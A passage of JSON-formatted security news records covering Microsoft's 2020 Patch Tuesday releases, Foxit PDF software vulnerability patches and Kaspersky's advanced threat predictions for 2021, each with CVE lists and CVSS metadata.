view](<https://msrc.microsoft.com/update-guide/vulnerability>). Columns like \u2018Exploited\u2019 and \u2018Publicly Disclosed\u2019 allow you to sort and view quickly if there are high-risk items.\u201d\n\n[**On October 14 at 2 PM ET**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[**Register today**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[**Retail Security: Magecart and the Rise of e-Commerce Threats.**](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[**LIVE **](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.**\n", "cvss3": {}, "published": "2020-10-13T20:44:01", "type": "threatpost", "title": "October Patch Tuesday: Microsoft Patches Critical, Wormable RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-16891", "CVE-2020-16898", "CVE-2020-16909", "CVE-2020-16911", "CVE-2020-16915", "CVE-2020-16923", "CVE-2020-16938", "CVE-2020-16947", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-16967", "CVE-2020-16968", "CVE-2020-17003", "CVE-2020-5135"], "modified": "2020-10-13T20:44:01", "id": "THREATPOST:779B904F971138531725D1E57FDFF9DD", "href": "https://threatpost.com/october-patch-tuesday-wormable-bug/160044/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:11", "description": "Foxit Software has released patches for dozens of high-severity flaws impacting its PDF reader and editor platforms. The most severe of the bugs, which exist on Windows versions of the software, enable a remote attacker to execute arbitrary code on vulnerable systems.\n\n[Overall, Foxit Software patched flaws](<https://www.foxitsoftware.com/support/security-bulletins.php>) tied to 20 CVEs in Foxit Reader and Foxit PhantomPDF (versions 9.7.1.29511 and earlier) for Windows. Foxit Reader is popular PDF software \u2013 with a user base of over 500 million for its free version \u2013 that provides tools for creating, signing and securing PDF files. PhantomPDF, meanwhile, enables users to convert different file formats to PDF. In addition to millions users for its branded software, major corporations as Amazon, Google,and Microsoft license Foxit Software technology, opening up its threat landscape even more.\n\n\u201cThere are several bugs that could result in remote code execution [RCE],\u201d Dustin Childs, manager at Trend Micro\u2019s Zero Day Initiative (ZDI), told Threatpost. \u201cAll of these should be considered critical.\u201d\n\n[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\n**Foxit Reader Flaws**\n\nThe high-severity flaws in Foxit Reader enable RCE; they are fixed in Foxit Reader version 9.7.2. In an attack scenario for these flaws, \u201cuser interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file,\u201d according to a Trend Micro ZDI [vulnerability analysis](<https://www.zerodayinitiative.com/advisories/published/>).\n\nIncluded are vulnerabilities ([CVE-2020-10899,](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10899>) [CVE-2020-10907](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10907>)) within the processing of XFA templates, a template embedded in PDFs that allows for fillable fields. The issues both result from the lack of validating the existence of an object prior to performing operations on that object. An attacker can leverage both flaws to execute code in the context of the current process. Researchers also found an RCE flaw ([CVE-2020-10900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10900>)) in the way AcroForms are processed. AcroForms are PDF files that contain form fields. Thebug exists because the AcroForms do not validate an object\u2019s existence prior to performing operations on that object.\n\nFinally, a flaw ([CVE-2020-10906](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10906>)) was addressed in the resetForm method within Foxit Reader PDFs. The issue here is that there\u2019s no check for an object prior to performing operations on the object, opening the process up to an RCE attack.\n\n**PhantomPDF**\n\nPhantomPDF also patched several high-severity flaws, which impact [versions 9.7.1.29511 and earlier;](<https://www.foxitsoftware.com/support/security-bulletins.php>) users are urged to update to PhantomPDF version 9.7.2. Childs said the most severe of these are two flaws in PhantomPDF\u2019s API communication ([CVE-2020-10890](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10890>) and [CVE-2020-10892](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10892>)). PhantomPDF API calls are necessary for creating PDFs from other document types. These flaws stem from the handling of the ConvertToPDF command and the CombineFiles command, which allow an arbitrary file write with attacker controlled data.\n\n\u201cCVE-2020-10890 and CVE-2020-10892 stand out as they are relatively easy to exploit,\u201d Childs told Threatpost. \u201cThey are very straightforward and don\u2019t require massaging or spraying memory to be successful.\u201d\n\nTwo other high-severity flaws ([CVE-2020-10912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10912>), [CVE-2020-10912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10912>)) stem from the handling of the SetFieldValue command, which are set by the API calls. A lack of proper validation of user-supplied data for these commands results in a type confusion condition \u2013 and ultimately arbitrary code execution. For all high-severity flaws above, an attacker can execute code in the context of the current process \u2013 but user interaction is required in that the target must visit a malicious page or open a malicious file.\n\n**3D Plugin**\n\nFlaws tied to 11 CVEs were also patched in the beta version of the U3DBrowser Plugin (9.7.1.29511 and earlier), a Foxit Reader and PhantomPDF plugin that allows viewing embedded 3D annotations in PDF files. The U3DBrowser Plugin flaws specifically stem from the handling of U3D objects in PDF files. Universal 3D (U3D) is a compressed file format standard for 3D computer graphics data, which can be inserted into PDF files.\n\nTwo flaws ([CVE-2020-10896](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10896>)) stem from a lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. A similar flaw ([CVE-2020-10893](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10893>)) stemming from lack of proper validation of user-supplied data can result in a write past the end of an allocated structure. Other flaws ([CVE-2020-10895](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10895>), [CVE-2020-10902](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10902>), [CVE-2020-10904](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10904>), [CVE-2020-10898](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10898>)) result from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure.\n\nTo address these issues, Foxit released 3D Plugin Beta 9.7.2.29539 for Foxit Reader and PhantomPDF.\n\nThese are only the latest flaws to be discovered Foxit Software products. In October 2019, [Foxit Software issued patches](<https://threatpost.com/foxit-pdf-reader-vulnerable-to-8-high-severity-flaws/148897/>) for eight high-severity flaws impacting Foxit Reader, and in [October 2018](<https://threatpost.com/foxit-pdf-reader-fixes-high-severity-remote-code-execution-flaws/137889/>) over 100 vulnerabilities were fixed.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-20T18:18:20", "type": "threatpost", "title": "Foxit PDF Reader, PhantomPDF Open to Remote Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10890", "CVE-2020-10892", "CVE-2020-10893", "CVE-2020-10895", "CVE-2020-10896", "CVE-2020-10898", "CVE-2020-10899", "CVE-2020-10900", "CVE-2020-10902", "CVE-2020-10904", "CVE-2020-10906", "CVE-2020-10907", "CVE-2020-10912", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-04-20T18:18:20", "id": "THREATPOST:F334DD851AFA845C7A29CB75F55E8128", "href": "https://threatpost.com/foxit-pdf-reader-phantompdf-remote-code-execution/154942/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:30:41", "description": "Microsoft has issued one of its largest Patch Tuesday updates for the shortest month of the year, addressing 99 security vulnerabilities across a range of products. Twelve of the bugs are listed as critical \u2013 and the rest are rated as being important.\n\nThe update includes a patch for the [zero-day memory-corruption vulnerability disclosed in late January](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) that\u2019s under active attack. The bug tracked as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>) is a critical flaw for most Internet Explorer versions, allowing remote code-execution and complete takeover.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis browser bug impacts IE and the other programs that rely on the Trident rendering engine,\u201d explained Dustin Childs, researcher with Trend Micro\u2019s Zero Day Initiative, in his[ Patch Tuesday analysis](<https://www.thezdi.com/blog/2020/2/11/the-february-2020-security-update-review>). \u201cAttackers can execute code on affected systems if a user browses to a specially crafted website. Even if you don\u2019t use IE, you could still be affected by this bug though embedded objects in Office documents. Considering the listed workaround \u2013 disabling jscript.dll \u2013 breaks a fair amount of functionality, you should prioritize the testing and deployment of this patch.\u201d\n\nAlso of note: February 2020 marks the first security updates for the new Edge Chromium browser edition. There were 41 vulnerabilities fixed in the Chromium-based Edge version that were technically not part of Patch Tuesday \u2013 which brings the total number of bugs fixed by Microsoft this week to 140.\n\n## Critical Patches for February 2020\n\nThe update includes a wealth of \u201cstandout\u201d bugs, according to researcher analyses, including several critical vulnerabilities in addition to the zero day.\n\nAccording to Jay Goodman, technical marketing manager at Automox, bugs to watch include [CVE-2020-0618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0618>) and [CVE-2020-0662](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0662>) (only the latter is listed as critical), which are nearly identical remote code-execution (RCE) bugs in SQL Server 2012, 2014 and 2016 (32 and 64 bit) and Windows 7, 8.1, 10, Server 2008, 2012, 2016 and 2019, respectively.\n\n\u201cThese vulnerabilities allow attackers to access a system and read or delete contents, make changes or directly run code on the system,\u201d he said via email. \u201cThis gives an attacker quick and easy access to not only your organization\u2019s most critical data stored in the SQL server but also a platform to perform additional malicious attacks against other devices in your environment.\u201d\n\nThe critical bug can lead to RCE if an attacker has Domain User credentials, according to Jimmy Graham, researcher with Qualys.\n\n\u201cWhile this vulnerability is labeled as \u2018exploitation less likely,\u2019 this vulnerability can be attacked over the network with no user interaction according to the CVSS Vector Strings set by Microsoft,\u201d he explained in [an analysis](<https://blog.qualys.com/laws-of-vulnerabilities/2020/02/11/february-2020-patch-tuesday-99-vulns-12-critical-patch-for-ie-0-day-exchange-vuln-adobe-vulns>). \u201cThe impacted service is not stated in the bulletin. Based on the information given, this should be prioritized across all Windows servers and workstations.\u201d\n\nAdditionally, two critical remote code-execution vulnerabilities in Remote Desktop ([CVE-2020-0681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0681>) and [CVE-2020-0734](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0734>)) were patched, and are likely to be exploited, according to Microsoft.\n\n\u201cExploitation of these requires an attacker to either persuade their victim into connecting to a vulnerable Remote Desktop Server operated by the attacker, or plant malicious code on a compromised Remote Desktop Server and wait for the vulnerable user to connect to it,\u201d Satnam Narang, senior research engineer at Tenable, explained via email.\n\nRichard Tsang, senior software engineer at Rapid7, told Threatpost that CVE-2020-0734 is a critical Windows Remote Desktop Client vulnerability that exists in how connection requests are handled.\n\n\u201cThe stream of [Windows Remote Desktop vulnerabilities continues](<https://threatpost.com/wormable-remote-desktop-bugs-august-patch-tuesday/147302/>), albeit having slowed down,\u201d he said. \u201cIn this scenario, a compromised legitimate server (or a malicious server) can be used to trigger the remote code execution. Given the extra eyes on RDP vulnerabilities of late, prioritizing operating system patches on this front would be a prudent move.\u201d\n\nOne other critical bug to note is [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>), a .LNK RCE vulnerability, which Childs said is similar to the bug that was exploited by [the Stuxnet malware](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>). Stuxnet was used to take out Iranian nuclear enrichment facilities in 2012. The new bug can also be used to attack air-gapped \u201csecure\u201d systems, he said, by exploiting shortcut .LNK files.\n\n\u201cBugs impacting link files (.LNK) never fail to amaze me,\u201d said Childs. \u201cAn attacker could use this vulnerability to get code execution by having an affected system process a specially crafted .LNK file. This could be done by convincing a user to open a remote share, or \u2013 as has been seen in the past \u2013 placing the .LNK file on a USB drive and having the user open it. It\u2019s a handy way to exploit an air-gapped system.\u201d\n\nThe other critical bugs fixed by Microsoft in February are CVE-2020-0738, a Media Foundation Memory Corruption Vulnerability allowing RCE; and several Scripting Engine Memory Corruption Vulnerabilities allowing RCE. This latter group includes CVE-2020-0710, CVE-2020-0711, CVE-2020-0712, CVE-2020-0713, CVE-2020-0673 and CVE-2020-0767.\n\n## Important-Rated Patches\n\nAs for the important-rated patches, the volume of elevation-of-privilege (EoP) bugs being patched is \u201csomewhat staggering,\u201d ZDI\u2019s Childs noted, with 55 patches in all. Also, information-disclosure bugs are well-represented, with 16 patches in February, including a publicly known bug ([CVE-2020-0706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0706>)) impacting IE and Edge. Childs said that six of them exist in the Cryptography Next Generation (CNG) portion of the Windows Key Isolation service.\n\nChilds also flagged [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), a memory-corruption bug in Microsoft Exchange, which could be trivially exploited to grant an attacker the ability to create a new account, install programs, and view, change or delete data.\n\n\u201cThis code-execution bug in Exchange is only listed as important, but you should treat it as a critical-rated vulnerability,\u201d he said. \u201cAn attacker could gain code execution on affected Exchange servers by sending a specially crafted email. No other user interaction is required. The code execution occurs at System-level permissions, so the attacker could completely take control of an Exchange server through a single email.\u201d\n\n## Racing Against Exploitation\n\nMicrosoft\u2019s February update is the largest in quite some time, researchers said, with flaws disclosed for Windows, Edge (EdgeHTML-based), ChakraCore, Internet Explorer (IE), SQL Server, Exchange Server, Office, Office Services and Web Apps, Azure DevOps Server, Team Foundation Server and the Microsoft Malware Protection Engine.\n\nAnd, five of the CVEs (including the previously mentioned zero day and the info-disclosure bug affecting browsers) have been publicly disclosed \u2014 and thus offer a threat actors a head start on exploitation.\n\n\u201cOverall, this is a very heavy Patch Tuesday on the Microsoft end. The race to patch critical vulnerabilities on your systems within the next 72 hours is on,\u201d Goodman advised. \u201cAttackers will have no shortage of exploitable vulnerabilities and new attack vectors to bring to bear in the coming days with nearly every build of Windows accounted for with critical vulnerabilities.\u201d\n\nAlso, for the first time, Microsoft is not updating Windows 7 this month.\n\n\u201cToday is a significant Patch Tuesday, marking the first time there will be no patches for Windows 7,\u201d Rui Lopes, engineering and technical support director at Panda Security, told Threatpost. \u201cHowever, that doesn\u2019t mean there aren\u2019t vulnerabilities. In fact, today\u2019s release features several critical and zero-day patches to be deployed, so any machines still running Windows 7 are now, by default, exceptionally vulnerable\u2014providing open doors for hackers to walk through and exploit. Therefore, if you have any devices running Windows 7, it is top priority to update them immediately.\u201d\n\nThe good news, according to Todd Schell, senior product manager for security at Ivanti, is that most of the CVEs can be resolved by applying just a few Microsoft updates.\n\n\u201cOn average, your OS updates will resolve around 50 CVEs,\u201d he explained, via email. \u201cThe normal updates still apply. OS, browsers, and Office will resolve most of your vulnerabilities from the Microsoft side. SQL and Exchange Admins do get a bit of extra work this month as both of those products are included in the updates released\u2026[but with] a couple of patches per system you can take the teeth out of the majority of the risk this month.\u201d\n\nOne vulnerability worth mentioning in this context this month is [CVE-2020-0689](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0689>), a security feature bypass that was also previously disclosed; an attacker could bypass secure boot and load untrusted software.\n\nBoth Childs and Tsang noted that while the vulnerability itself is not that interesting, what stands out is the fact that the remediation steps are different from the usual patching practices.\n\n\u201cWhereas most operating system-level vulnerabilities are bundled in either a Security-Only/Monthly Rollup or Cumulative Update stream, this fix is segregated out in separate KB patches that also have explicit Servicing Stack Update prerequisites,\u201d Tsang said. \u201cThe idea that there\u2019s a change in process, in itself, is something to note.\u201d\n\nChilds added, \u201cWhile this is certainly a bug to scrutinize, it\u2019s compounded by a non-standard patching process. This month\u2019s servicing stack must first be applied, then additional standalone security updates need to be installed. If you have the Windows Defender Credential Guard (Virtual Secure Mode) enabled, you\u2019ll need to go through two additional reboots as well. All this is needed to block impacted third-party bootloaders.\u201d\n\n**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us **[**Wednesday, Feb. 19 at 2 p.m. ET**](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>)** when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**\n", "cvss3": {}, "published": "2020-02-11T22:06:57", "type": "threatpost", "title": "Microsoft Addresses Active Attacks, Air-Gap Danger with 99 Patches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0618", "CVE-2020-0662", "CVE-2020-0673", "CVE-2020-0674", "CVE-2020-0681", "CVE-2020-0688", "CVE-2020-0689", "CVE-2020-0706", "CVE-2020-0710", "CVE-2020-0711", "CVE-2020-0712", "CVE-2020-0713", "CVE-2020-0729", "CVE-2020-0734", "CVE-2020-0738", "CVE-2020-0767", "CVE-2020-5135"], "modified": "2020-02-11T22:06:57", "id": "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "href": "https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-11-19T10:27:24", "description": "\n\nTrying to make predictions about the future is a tricky business. However, while we don't have a crystal ball that can reveal the future, we can try to make educated guesses using the trends that we have observed over the last 12 months to identify areas that attackers are likely to seek to exploit in the near future.\n\nLet's start by reflecting on [our predictions for 2020](<https://securelist.com/advanced-threat-predictions-for-2020/95055/>). \n \n\n\n * **The next level of false flag attacks** \nThis year, we haven't seen anything as dramatic as the forging of a malicious module to make it look like the work of another threat actor, as was the case with [Olympic Destroyer](<https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/>). However, the use of false flags has undoubtedly become an established method used by APT groups to try to deflect attention away from their activities. Notable examples this year include the campaigns of MontysThree and [DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>). Interestingly, in the DeathStalker case, the actor incorporated certificate metadata from the infamous Sofacy in their infrastructure, trading covertness for the chance of having their operation falsely attributed.\n\n * **From ransomware to targeted ransomware** \nLast year, we highlighted the shift towards targeted ransomware and predicted that attackers would use more aggressive methods to extort money from their victims. This year, hardly a week has gone by without news of an attempt to extort money from large organizations, including recent [attacks on a number of US hospitals](<https://www.techradar.com/news/ryuk-ransomware-returns-and-takes-multiple-us-hospitals-offline>). We've also seen the emergence of 'brokers' who offer to [negotiate with the attackers](<https://www.bbc.co.uk/news/technology-53214783>), to try to reduce the cost of the ransom fee. Some attackers seem to apply greater pressure by stealing data before encrypting it and threatening to publish it; and in a recent incident, affecting a large psychotherapy practice, [the attackers posted sensitive data of patients](<https://threatpost.com/vastaamo-hackers-blackmailing-therapy-patients/160536/>).\n\n * **New online banking and payments attack vectors** \nWe haven't seen any dramatic attacks on payment systems this year. Nevertheless, financial institutions continue to be targeted by specialist cybercrime groups such as FIN7, CobaltGroup, Silence and Magecart, as well as APT threat actors such as Lazarus.\n\n * **More infrastructure attacks and attacks against non-PC targets** \nAPT threat actors have not confined their activities to Windows, as illustrated by the extension of Lazarus's MATA framework, the development of Turla's Penquin_x64 backdoor and the targeting of European supercomputing centers in May. We also saw the use of multiplatform, multi-architecture tools such as Termite and Earthworm in operation [TunnelSnake](<https://securelist.com/apt-trends-report-q3-2020/99204/>). These tools are capable of creating tunnels, transferring data and spawning remote shells on the targeted machines, supporting x86, x64, MIPS(ES), SH-4, PowerPC, SPARC and M68k. On top of this, we also discovered the framework we dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>), which includes a compromised UEFI firmware image designed to drop malware onto infected computers.\n\n * **Increased attacks in regions that lie along the trade routes between Asia and Europe** \nIn 2020, we observed several APT threat actors target countries that had previously drawn less attention. We saw various malware used by Chinese-speaking actors used against government targets in Kuwait, Ethiopia, Algeria, Myanmar and the Middle East. We also observed StrongPity deploying a new, improved version of their main implant called StrongPity4. In 2020 we found victims infected with StrongPity4 outside Turkey, located in the Middle East.\n\n * **Increasing sophistication of attack methods** \nIn addition to the UEFI malware mentioned above, we have also seen the use of legitimate cloud services (YouTube, Google Docs, Dropbox, Firebase) as part of the attack infrastructure (either geo-fencing attacks or hosting malware and used for C2 communications).\n\n * **A further change of focus towards mobile attacks** \nThis is apparent from the reports we have published this year. From year to year we have seen more and more APT actors develop tools to target mobile devices. Threat actors this year included OceanLotus, the threat actor behind [TwoSail Junk](<https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/>), as well as Transparent Tribe, OrigamiElephant and many others.\n\n * **The abuse of personal information: from deep fakes to DNA leaks** \nLeaked/stolen personal information is being used more than ever before in up-close and personal attacks. Threat actors are less afraid than ever to engage in active ongoing communications with their victims, as part of their spear-phishing operations, in their efforts to compromise target systems. We have seen this, for example, in Lazarus's ThreatNeedle activities and in DeathStalker's efforts to pressure victims into enabling macros. Criminals have [used AI software to mimic the voice of a senior executive](<https://www.computing.co.uk/news/3081119/ai-mimick-voice-crime>), tricking a manager into transferring more than \u00a3240,000 into a bank account controlled by fraudsters; and [governments and law enforcement agencies have used facial recognition software for surveillance](<https://www.google.com/url?q=https://cyberblogindia.in/facial-recognition-incidents-of-abuse-issues/&sa=D&ust=1604679900047000&usg=AOvVaw1cRKsUQ1UuirnO1ulgCIP6>).\n\nTurning our attention to the future, these are some of the developments that we think will take center stage in the year ahead, based on the trends we have observed this year.\n\n## APT threat actors will buy initial network access from cybercriminals\n\nIn the last year, we have observed many targeted ransomware attacks using generic malware, such as Trickbot, to gain a foothold in target networks. We have also observed connections between targeted ransomware attacks and well-established underground networks like Genesis that typically trade in stolen credentials. We believe APT actors will start using the same method to compromise their targets. Organizations should pay increased attention to generic malware and perform basic incident response activities on each compromised computer to ensure generic malware has not been used deploy sophisticated threats.\n\n## More countries using legal indictments as part of their cyberstrategy\n\nSome years ago we predicted that governments would resort to "naming and shaming", to draw attention to the activities of hostile APT groups. We have seen several cases of this over the last 12 months. We think that US Cyber Command's "persistent engagement" strategy will begin to bear fruit in the coming year and lead other states to follow suit, not least as "tit for tat" retaliation to US indictments. Persistent engagement involves publicly releasing reports about adversary tools and activities. US Cyber Command has argued that warfare in cyberspace is of a fundamentally different nature, and requires full-time engagement with adversaries to disrupt their operations. One of the ways they do so is by providing indicators that the threat intelligence community can use to bootstrap new investigations - in a sense, it is a way of orienting private research through intelligence declassification.\n\nTools "burned" in this way become harder to use for the attackers, and can undermine past campaigns that might otherwise have stayed under the radar. Faced with this new threat, adversaries planning attacks must factor in additional costs (the heightened possibility of losing tools or these tools being exposed) in their risk/gain calculus.\n\nExposing toolsets of APT groups is nothing new: [successive leaks by Shadow Brokers](<https://www.wired.co.uk/article/nsa-hacking-tools-stolen-hackers>) provide a striking example. However, it is the first time it has been done in an official capacity through state agencies. While quantifying the effects of deterrence is impossible, especially without access to diplomatic channels where such matters are discussed, we believe that more countries will follow this strategy in 2021. First, states traditionally aligned with the US may start replicating the process, and then, later on, the targets of such disclosures could follow suit as a form of retaliation.\n\n## More Silicon Valley companies will take action against zero-day brokers\n\nUntil recently, zero-day brokers have traded exploits for well-known commercial products; and big companies such as Microsoft, Google, Facebook and others have seemingly paid little attention to the trade. However, in the last year or so, there have been high-profile cases where accounts were allegedly compromised using WhatsApp vulnerabilities - including [Jeff Bezos](<https://www.forbes.com/sites/thomasbrewster/2020/01/22/if-jeff-bezos-iphone-can-be-hacked-over-whatsapp-so-can-yours/?sh=289de209795d>) and [Jamal Khashoggi](<https://edition.cnn.com/videos/world/2019/01/12/jamal-khashoggi-whatsapp-phone-malware-oren-liebermann-pkg-vpx.cnn>). In October 2019, WhatsApp filed a [lawsuit accusing Israel-based NSO Group of having exploited a vulnerability in its software](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/?guccounter=1>); and that the technology sold by NSO was used to target more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. A [US judge subsequently ruled that the lawsuit could proceed](<https://www.theguardian.com/technology/2020/jul/17/us-judge-whatsapp-lawsuit-against-israeli-spyware-firm-nso-can-proceed>). The outcome of the case could have far-reaching consequences, not least of which could be to lead other firms to take legal action against companies that deal in zero-day exploits. We think that mounting public pressure, and the risk of reputation damage, may lead other companies to follow WhatsApp's lead and take action against zero-day brokers, to demonstrate to their customers that they are seeking to protect them.\n\n## Increased targeting of network appliances\n\nWith the trend towards overall improvement of organizational security, we think that actors will focus more on exploiting vulnerabilities in network appliances such as VPN gateways. We're already starting to see this happen - see [here](<https://www.gosecure.net/blog/2020/08/26/forget-your-perimeter-rce-in-pulse-connect-secure/>), [here ](<https://www.zdnet.com/article/hacker-groups-chain-vpn-and-windows-bugs-to-attack-us-government-networks/>)and [here ](<https://www.tripwire.com/state-of-security/vert/sonicwall-vpn-portal-critical-flaw-cve-2020-5135/>)for further details. This goes hand-in-hand with the shift towards working from home, requiring more companies to rely on a VPN setup in their business. The increased focus on remote working, and reliance on VPNs, opens up another potential attack vector: [the harvesting of user credentials through real-world social engineering approaches such as "vishing"](<https://krebsonsecurity.com/wp-content/uploads/2020/08/fbi-cisa-vishing.pdf>) to obtain access to corporate VPNs. In some cases, this might allow the attacker to even accomplish their espionage goals without deploying malware in the victim's environment.\n\n## The emergence of 5G vulnerabilities\n\n5G has attracted a lot of attention this year, with the US exerting a lot of pressure on friendly states to discourage them from buying Huawei products. In many countries, there were also numerous scare stories about possible health risks, etc. This focus on 5G security means that researchers, both public and private, are definitely looking at the products of Huawei and others, for signs of implementation problems, crypto flaws and even backdoors. Any such flaws will certainly receive massive media attention. As usage of 5G increases, and more devices become dependent on the connectivity it provides, attackers will have a greater incentive to look for vulnerabilities that they can exploit.\n\n## Demanding money "with menaces"\n\nWe have seen several changes and refinements in the tactics used by ransomware gangs over the years. Most notably, attacks have evolved from random, speculative attacks distributed to a large number of potential victims, to highly targeted attacks that demand a considerably greater payout from a single victim at a time. The victims are carefully selected, based on their ability to pay, their reliance on the data encrypted and the wider impact an attack will have. And no sector is considered off limits, [notwithstanding the promises ransomware gangs made not to target hospitals](<https://www.bleepingcomputer.com/news/security/ransomware-gangs-to-stop-attacking-health-orgs-during-pandemic/>). The delivery method is also customized to fit the targeted organization, as we have seen with attacks on medical centers and hospitals throughout the year.\n\nWe have also seen ransomware gangs seeking to obtain greater leverage by threatening to [publish stolen data](<https://www.theregister.com/2020/06/24/maze_ransomware_gang_vt_aerospace_rant/>) if a company fails to pay the ransom demanded by the attackers. This trend is likely to develop further as ransomware gangs seek to maximize their return on investment.\n\nThe ransomware problem has become so prevalent that the OFAC (Office of Foreign Assets Control) [released instructions](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20201001>) for victims and clarified that paying ransoms could constitute a breach of international sanctions. We interpret this announcement as the beginning of a wider crackdown on the cybercrime world by US authorities.\n\nThis year, the [Maze](<https://securelist.com/maze-ransomware/99137/>) and Sodinokibi gangs both pioneered an "affiliate" model involving collaboration between groups. Nevertheless, the ransomware eco-system remains very diverse. It's possible that in the future we will see a concentration of major ransomware players who will start to focus their activities and obtain APT-like capabilities. However, for some time to come, smaller gangs will continue to adopt the established approach that relies on piggybacking botnets and sourcing third-party ransomware.\n\n## More disruptive attacks\n\nMore and more aspects of our lives are becoming dependent on technology and connectivity to the internet. As a result, we present a much wider attack surface than ever before. It's likely, therefore, that we will see more disruptive attacks in the future. On the one hand, this disruption could be the result of a directed, orchestrated attack, designed to affect critical infrastructure. On the other hand, it could be collateral damage that occurs as a side-effect of a large-volume ransomware attack targeting organizations that we use in our day-to-day lives, such as educational institutions, supermarkets, postal services and public transportation.\n\n## Attackers will continue to exploit the COVID-19 pandemic\n\nThe world has been turned upside down by COVID-19, which has impacted nearly every aspect of our lives this year. Attackers of all kinds were quick to seize the opportunity to exploit the keen interest in this topic, including APT threat actors. As we have noted before, this did not mark a change in TTPs, but simply a persistent topic of interest that they could use as a social engineering lure. The pandemic will continue to affect our lives for some time to come; and threat actors will continue to exploit this to gain a foothold in target systems. During the last six months, there have been reports of APT groups targeting COVID-19 research centers. The UK National Cyber Security Centre (NCSC) stated that APT29 (aka the Dukes and Cozy Bear) [targeted COVID-19 vaccine development](<https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf>). This will remain a target of strategic interest to them for as long as the pandemic lasts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/19093045/KSB-2020_APT-predictions-map.png>)", "cvss3": {}, "published": "2020-11-19T10:00:48", "type": "securelist", "title": "Advanced Threat predictions for 2021", "bulletinFamily": "blog", "cvss2": {}, 